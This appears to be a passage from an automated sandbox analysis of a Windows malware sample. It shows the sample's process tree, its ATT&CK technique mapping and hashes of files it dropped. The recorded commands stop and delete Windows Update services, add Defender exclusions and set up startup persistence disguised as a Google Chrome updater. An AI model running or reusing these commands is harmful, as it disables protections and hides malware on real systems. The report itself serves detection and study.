    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4164
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4116
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4528
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2244
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2140
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4192
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gcwwawj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4092
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:4772
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4388
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3312
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5016
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:828
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4908
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1468
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3672
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:596
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4628
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4176
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3744
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4776
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2232
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:792
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1308
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4544
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4744
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4012
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uhmvz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4676
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe efmrrelasnejro
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:536
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:792
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe ltwajqyxezzfihss 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzk2eWYjwKK+fEWG7iUzJYUGYWt/uXq0L5q1ZNkgmr1/j91tEt+Do0WPWZE9vv1ws2Nq0tzXuwM/8t3/MzIyUfiCEOfW2dmYMJleOersijbUIIVkTDpMVO7OlPs8EwJRwXu66ASwbMEVwf9LeWLBpDoqHBDXDSsoWRvYPR/6A/nbGeVbQ73TDrCfbq7qpdMKD50rT6W7oerDlO0zCBR2xq85zjvAW+T42Yu0OlpSDxzZBbymP5xe3R1tOCvRDZxL9BnFXCZKAxzfsa7+dBb1ZdgrlJa8h6DqybNFts1WGgFjatH5INpNUS8Gr6pPoEWVZUti2DV5w1IGQmx1ANElIv1drRURs4JIOAFSfEwQTIjXZw+hy+P9AVYT+lB3o933XM8Eh0PB7EbJLOYDfUqQHKjOeM6qnpfoRDg3KFg80vkRSpaFKGTtZxJcWOGzPfeQpXsXNyfXIM4m9Zlg+GXmd/tpgU3R7T/T5g242w+V50OvFUUvlrEYLPv5aE4t0zF8A1ptrAiOsA9xCff6qmIqtCpE0Kw/3biKGxxxQwy4P8mWZI1ttrBSle7N7o4vRoIzqV
  2⤵
  - Modifies data under HKEY_USERS
  PID:1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2632

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2172

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1572

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3740

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
bb3db59f9e40fa7787d6f1d43b6af664

SHA1
d2264d0a05776a9aba1740a2eeed9d884b342d94

SHA256
f37e26c283ce158a231c2806dd429e6075f8cc4145a670213b901dcec603b85d

SHA512
c936440f62e3104750f2012d624b740a7d3ce68bbc9706e773f15a76df0dbf9a19f314877dd743aaa81a407fad7ab41a35d029e28cc0bcb8e6cafaa2d96e0b2c

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
bb3db59f9e40fa7787d6f1d43b6af664

SHA1
d2264d0a05776a9aba1740a2eeed9d884b342d94

SHA256
f37e26c283ce158a231c2806dd429e6075f8cc4145a670213b901dcec603b85d

SHA512
c936440f62e3104750f2012d624b740a7d3ce68bbc9706e773f15a76df0dbf9a19f314877dd743aaa81a407fad7ab41a35d029e28cc0bcb8e6cafaa2d96e0b2c

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD76.tmp.csv

Filesize
33KB

MD5
267391f6ad6c243e493e72cfa23f0b54

SHA1
e48f12f152b8fb161d9528aee1723100da2da0ff

SHA256
d2d6af34ad4b4f0f5452b9f9582b907c06523a8aa792a22d341bd171059998a8

SHA512
d15314f8065bd21b2ea8567774ec41e511a6e17a9c44473ef5965c7029c76908238c1e95cfad0647a05a1dfbca82bf88327c063d32bc178f37416a7f73bc1ed8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERADB6.tmp.txt

Filesize
12KB

MD5
75e7ac6e1f574e5d9e931f53a11bdc37

SHA1
c5b975c8872d4464a13a44f22a1b49196d8ceb4a

SHA256
f8b05c91b38c57afd4471c5571d32524f5c5ed13dcedf7709d403416840c984b

SHA512
9dedca45a1a1ff2f71fa729ab277dfe2bd7b2017127d647a09a51dcfef98f0c68ecf7bd11678bf0bf095f7743c4a8e1478b5762e528d4591b73a5eb8b5b55b40

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF0E.tmp.csv

Filesize
33KB

MD5
6b30153be8caee3d04db397187501e87

SHA1
682c5f0e03e17d58665399d4eed3e4e88fdfb22c

SHA256
97e9ea8e440edfaf6ea31a6453d34f7a75ad320d066dcdb4161e0bca47ae3a40

SHA512
ed97703734a0a92404dbca332691dbba760f1bbb90a7944593c19b392abb63a601e95547f52e13201810c1e377eef8a4be2f74c270bb95aeec44a7104e2e1284

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF3E.tmp.txt

Filesize
12KB

MD5
5957c42ae1da835437410f29c52cbba8

SHA1
f1771edb5a86103f888a9960df11d3ce5c902a82

SHA256
6a252403e731e55b875702a4f3ad2a879ae3a71aff9a13062864aeca17156e06

SHA512
59d3accd97fbb0c1104e661b44e87ac2671f2e63c7c47fd15575172602017b5a913c402ff960f1ed2348dd15fef718bbbf6e2beef5887b4e5ce9f88dbae0faee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
900713b658f108100bb7aa144134dbca

SHA1
7a05dd4d5cd03542c5187c8a3036f30b9d79daf0

SHA256
c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8

SHA512
85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5484ac02b5611d2c9852a5100891faea

SHA1
7f287c1825b149ea7fe76cdccb64aca0a716f4eb

SHA256
59c9469120dd8c24b90cd8765f8a43795e93930c6c2bc58033cc6d1b84331b45

SHA512
94b8a4a1696b8ec7251410d5d104a91a8ecd40fa6c443f4dc14824f03bd70f2c8dc2e2f974d3111e9b6e0239db27213ad7473b0456ef01ca8b135cdbdba6a1ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c03455ef090cd85e4410a5c59c35aea2

SHA1
61b321932b27091349a391c42ce55385a4e4d9ce

SHA256
4c16a54bb9e6ba3e68335df697e10be42061f1085d16f35d8e6b283e98bf591f

SHA512
9553067072017fe9b3eaaf19dd71520589090f18074503722ba60e0d6c76bedd93f7f9c275d5861756026cc9e71ea71be4399c7da774e97f07f38ecd30964c72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fea4ec05848445c3b37f8e6bc20d6fff

SHA1
2b78d386aa15d00c56c9e3e80dffbe1dcb852040

SHA256
6c5c56831e1ff8f09083ecf79da8ab9225588b402a4ca8d9d95a756023c01ec3

SHA512
ded8a086afb97cb658ebc9a267f385f61e5efd78b2584f98388e14fb4eed4fce1b76d852054698e4d981b89f71331dc2111d7e4817e236ed5b2977213f555cdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ed1bdf775d41a38689d559176b8aa1ae

SHA1
ffcc76e4eecf9a530c0b38a9e0dfefe6cf161816

SHA256
c069a6d9b48f0d12b98a88af70530e66d4b2ca608762f936c7467da2fc503cd5

SHA512
1b3b5cb62b905a98b7477a9fe7929920e1bafcd05cff484a9141e7910287547b12306ffd8395effcddb080d20120115377fd435d732fcc4458a4a41b43d81605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e32c6aa96e5376df9c3999121b0ab150

SHA1
5fd62e7f671e01b552ea89dd97405f11e29c70d1

SHA256
459178e233b3a66935dc61a04529cc1a2917711e0a35f50ef82b4a9190773ae4

SHA512
3db24b72731551752411a684bc12af62eb31bf72a19f0c125e665ecd5ab033273d643a14988d51736c285142b76c122daf9385e70ecb6a0f4b23da03dd2a42c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f62709a631c030ce853f09e873ce2cd2

SHA1
557e2993d9814a88a6e153f7e6429a6ca542184e

SHA256
81ca5d4f365a9410374a0b198327a56bdf69f96e867e035ae0226924c008dfc7

SHA512
e7999a4e19cc2e8f8772baa188d2a98f55e8aebc7d571028947f129f79382e14c6795311eb6a7a204a93c52ba0f345ee7d6b1f7640e0c8cd1b79b49c0edd2840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a55a13d6e2efc68e96cd63adb0e76f9a

SHA1
62e173071f404ac8b1f4406623906e87815ab95e

SHA256
f7235377bc27947b711a0e2a8d70f4130bc48e611c40d6a33d1fee0e1118d523

SHA512
be2e4f81cd971c68322294c0df086b925293e1c06c36c500985c53bcbe38350fcda24e11874d0d6c92f61de5803681c2ea306d0d86665d1469e831c3e152acd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
164e074c6ab833e694061e24778d9999

SHA1
c5cb0993c97f7754ab4340b8f8ef8f963fd408e9

SHA256
fa49b909d96cb9d36d99a0a64d9121bede7405de63a5c073675259167be78f37

SHA512
272f71d2c2198190a26ccf93600f3f718162f0b5bcac52cfc47d0d764c20187603f926c232405aff024c892912426c6bd479e5b89ff9ea63ce9c53d301abcc85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87c36726455a1006bc59b5bafa0cd425

SHA1
ec901b79d67dd9d4c7577cef4c6c6d18a6e217ee

SHA256
773bccdacf15b62b5237193918197c046b29a5c9e4b05106eb6df19ad3bedcf3

SHA512
19737299a8970e2bbf8c33cca7293df407d9f9b78198d49fb8032f6bf4ec9bb4b39393e135fa8841d0387716f97b01cfd4780eb551f3d45f85710276b268106a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
ac6c59afc4affddff6808d695898ff4e

SHA1
26caa6ef7a6c1fafc7a12cfe0abb53d9c2218d2f

SHA256
2bc2124adffa029cc50bb19a7b077fd52820fdb327c639717b2435688cf2de7d

SHA512
31f74b005f60270a2412f9b9833d11e8c43b5515510a2c84113d32c4876776a4ef69c078a34713dd98b99c10a2a8cc3fb96061cba7767817606181d5a9eeebe2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
ac6c59afc4affddff6808d695898ff4e

SHA1
26caa6ef7a6c1fafc7a12cfe0abb53d9c2218d2f

SHA256
2bc2124adffa029cc50bb19a7b077fd52820fdb327c639717b2435688cf2de7d

SHA512
31f74b005f60270a2412f9b9833d11e8c43b5515510a2c84113d32c4876776a4ef69c078a34713dd98b99c10a2a8cc3fb96061cba7767817606181d5a9eeebe2

Download Submit
C:\Users\Admin\AppData\Local\Temp\26B2.tmp\26B3.tmp\26B4.bat

Filesize
932B

MD5
8bbfb8fa51a27ac3bfc39ebaf1c2fa0c

SHA1
6af4250511b1eaed2b270e7bc39211a63b256dae

SHA256
d3fe5bd8c6e298f095585027d31db1102ace6448b1a9a84b1fc83c8650d7ad14

SHA512
e514ed88496c02f98b3d6813d287b3b47f530816b06a0630a57607b5989529357cad5c62e28ec5d8e8897bc48c47af87976a13433597a37afd2edc9d6375447d

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOWNLOADLIST.exe

Filesize
43KB

MD5
c4e7c64dc298b8761f51c003c7ab80b4

SHA1
b5a11f9cc1211d49dead97af095fc4eb4771487a

SHA256
21c68944c5161dc5336490d2f95c70b89c3bc7cfd1d5123b2755e6a26a81adfd

SHA512
1830c73cb9d14de6db40314cd3bd21b49153f0f8e5e9374b159f2b4154616bc12667a55ecbddbacdf945e62275e3b0757486d791cfc9aeca5638e788d613bb0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOWNLOADLIST.exe

Filesize
43KB

MD5
c4e7c64dc298b8761f51c003c7ab80b4

SHA1
b5a11f9cc1211d49dead97af095fc4eb4771487a

SHA256
21c68944c5161dc5336490d2f95c70b89c3bc7cfd1d5123b2755e6a26a81adfd

SHA512
1830c73cb9d14de6db40314cd3bd21b49153f0f8e5e9374b159f2b4154616bc12667a55ecbddbacdf945e62275e3b0757486d791cfc9aeca5638e788d613bb0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\extractor.exe

Filesize
121KB

MD5
e38fd55b3a0f58be079cf96055719aca

SHA1
cb89a298b97bbd424bc3129a4b90b1c836a2afdc

SHA256
623e8db58d6ce582f59f0eb863b2aed0cbf929578a2cc894c835a13623055b2d

SHA512
0b43f7e7d494b145711ca03c55bce978c73c9bb4c96349adfe23783e3cea3d98d58d58489b02deb04609e2a3fe344edb87ea7cac8935bb1bd436cc7e6a958dfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\extractor.exe

Filesize
121KB

MD5
e38fd55b3a0f58be079cf96055719aca

SHA1
cb89a298b97bbd424bc3129a4b90b1c836a2afdc

SHA256
623e8db58d6ce582f59f0eb863b2aed0cbf929578a2cc894c835a13623055b2d

SHA512
0b43f7e7d494b145711ca03c55bce978c73c9bb4c96349adfe23783e3cea3d98d58d58489b02deb04609e2a3fe344edb87ea7cac8935bb1bd436cc7e6a958dfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\msedge.exe

Filesize
99KB

MD5
d3082ccffc611f1afc7a2f56cc09a6eb

SHA1
36eeb15adea86d142730b796bc0549811af94afb

SHA256
4708b72a3a181cdbe73e64a086a43dcaf54693a22501d29ab0c23782e8884ab0

SHA512
686d6d5266de2a392abad30c0ed68b2309b1c6804fc0cb461f5cd81e7bc080703e6104d09dd8d3c2adf381090256f15b5b80381756f5ced939e1cc0b9bc5e79b

Download Submit
C:\Users\Admin\AppData\Local\Temp\msedge.exe

Filesize
99KB

MD5
d3082ccffc611f1afc7a2f56cc09a6eb

SHA1
36eeb15adea86d142730b796bc0549811af94afb

SHA256
4708b72a3a181cdbe73e64a086a43dcaf54693a22501d29ab0c23782e8884ab0

SHA512
686d6d5266de2a392abad30c0ed68b2309b1c6804fc0cb461f5cd81e7bc080703e6104d09dd8d3c2adf381090256f15b5b80381756f5ced939e1cc0b9bc5e79b

Download Submit
C:\Users\Admin\AppData\Local\Temp\steamloadz_downloader.bat

Filesize
2KB

MD5
bf449b4f6558cb40b45fb97db72c81b2

SHA1
fc95d0f59a1e9b79e3aa86ffadab6feead0e8fb9

SHA256
378f7c5d30242670408fd835da57c54b68321bd15849196c8d0e4cee7f32112a

SHA512
9eecd1b2d3b4092f5e2597642665192d180ae41d61b7be572af1a8aa0e51c6a6f59c9aab6336eca62fbf9705c7b6aef1d2277405237a0c2a75a506484646d738

Download Submit
C:\Users\Admin\AppData\Local\Temp\torrentdecrypt.exe

Filesize
3.7MB

MD5
bb3db59f9e40fa7787d6f1d43b6af664

SHA1
d2264d0a05776a9aba1740a2eeed9d884b342d94

SHA256
f37e26c283ce158a231c2806dd429e6075f8cc4145a670213b901dcec603b85d

SHA512
c936440f62e3104750f2012d624b740a7d3ce68bbc9706e773f15a76df0dbf9a19f314877dd743aaa81a407fad7ab41a35d029e28cc0bcb8e6cafaa2d96e0b2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\torrentdecrypt.exe

Filesize
3.7MB

MD5
bb3db59f9e40fa7787d6f1d43b6af664

SHA1
d2264d0a05776a9aba1740a2eeed9d884b342d94

SHA256
f37e26c283ce158a231c2806dd429e6075f8cc4145a670213b901dcec603b85d

SHA512
c936440f62e3104750f2012d624b740a7d3ce68bbc9706e773f15a76df0dbf9a19f314877dd743aaa81a407fad7ab41a35d029e28cc0bcb8e6cafaa2d96e0b2c

Download Submit
C:\Users\Admin\AppData\Roaming\archive.exe

Filesize
8.4MB

MD5
9afd9bd39a383d46cdb27d5a84a63d87

SHA1
fa4a4650bdf2f832cbae65e71aaaac5020d828bc

SHA256
677a3f19d84f071a47c10cf555c15a2772a9d537c834877de3ed41eac627acf7

SHA512
1c81880734ac074eae536054e2000538b582d151336a05ee1a9633a8561daea748377a16959241d52dc6c2bcfc5e7ad6760a5174537fb9319709b3161f483e1a

Download Submit
C:\Users\Admin\AppData\Roaming\archive.exe

Filesize
8.4MB

MD5
9afd9bd39a383d46cdb27d5a84a63d87

SHA1
fa4a4650bdf2f832cbae65e71aaaac5020d828bc

SHA256
677a3f19d84f071a47c10cf555c15a2772a9d537c834877de3ed41eac627acf7

SHA512
1c81880734ac074eae536054e2000538b582d151336a05ee1a9633a8561daea748377a16959241d52dc6c2bcfc5e7ad6760a5174537fb9319709b3161f483e1a

Download Submit
C:\Users\Admin\AppData\Roaming\update.exe

Filesize
4.0MB

MD5
31f601737798a98e51fd2f3f669e43e9

SHA1
3075e8980af040f0e9e81e3f1156dfb2a33b2a7d

SHA256
d5e7a97d0c7ab96b894abce272c25bc79d1813c3453171d55bc950420467213d

SHA512
9f1af241a09149c82b1a3f0dfa92dc3c8631e3c7af2ae20078da0627be0b3f7652b89bf501cc82fd37f7ea9bec52ed24d041f2d2a22336d4cf93c982c4d3c939

Download Submit
C:\Users\Admin\AppData\Roaming\update.exe

Filesize
4.0MB

MD5
31f601737798a98e51fd2f3f669e43e9

SHA1
3075e8980af040f0e9e81e3f1156dfb2a33b2a7d

SHA256
d5e7a97d0c7ab96b894abce272c25bc79d1813c3453171d55bc950420467213d

SHA512
9f1af241a09149c82b1a3f0dfa92dc3c8631e3c7af2ae20078da0627be0b3f7652b89bf501cc82fd37f7ea9bec52ed24d041f2d2a22336d4cf93c982c4d3c939

Download Submit
C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe

Filesize
99KB

MD5
d3082ccffc611f1afc7a2f56cc09a6eb

SHA1
36eeb15adea86d142730b796bc0549811af94afb

SHA256
4708b72a3a181cdbe73e64a086a43dcaf54693a22501d29ab0c23782e8884ab0

SHA512
686d6d5266de2a392abad30c0ed68b2309b1c6804fc0cb461f5cd81e7bc080703e6104d09dd8d3c2adf381090256f15b5b80381756f5ced939e1cc0b9bc5e79b

Download Submit
C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe

Filesize
99KB

MD5
d3082ccffc611f1afc7a2f56cc09a6eb

SHA1
36eeb15adea86d142730b796bc0549811af94afb

SHA256
4708b72a3a181cdbe73e64a086a43dcaf54693a22501d29ab0c23782e8884ab0

SHA512
686d6d5266de2a392abad30c0ed68b2309b1c6804fc0cb461f5cd81e7bc080703e6104d09dd8d3c2adf381090256f15b5b80381756f5ced939e1cc0b9bc5e79b

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
855B

MD5
0bd582c313e0bb1746b478f11eeb352f

SHA1
8c373cb970466dcdeebd23741c78f469f8207a70

SHA256
0ac0a4e2be5078b0384f0ef820d66e4b04ff7e1ccfcaefa33927045e47fe925c

SHA512
78520ddc8b80a3a2253977c379ff343afe4633c04a32a0878ca1fd8dc22f846940c9d66e8e67c59f4ebf0db4b12488674f1fba3c9db18c6ae56f1111519041f8

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

